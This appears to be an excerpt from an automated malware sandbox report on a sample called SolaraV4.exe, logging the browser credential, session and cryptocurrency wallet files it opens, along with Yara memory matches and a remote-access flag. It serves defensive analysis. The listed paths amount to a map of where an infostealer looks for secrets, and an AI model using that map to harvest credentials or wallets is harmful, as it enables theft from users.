Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\protections.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Yara match File source: 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2975881407.0000024133496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2965972242.0000024133565000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI71122\rarreg.key, type: DROPPED
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E62B5D bind,WSAGetLastError, 3_2_00007FFE75E62B5D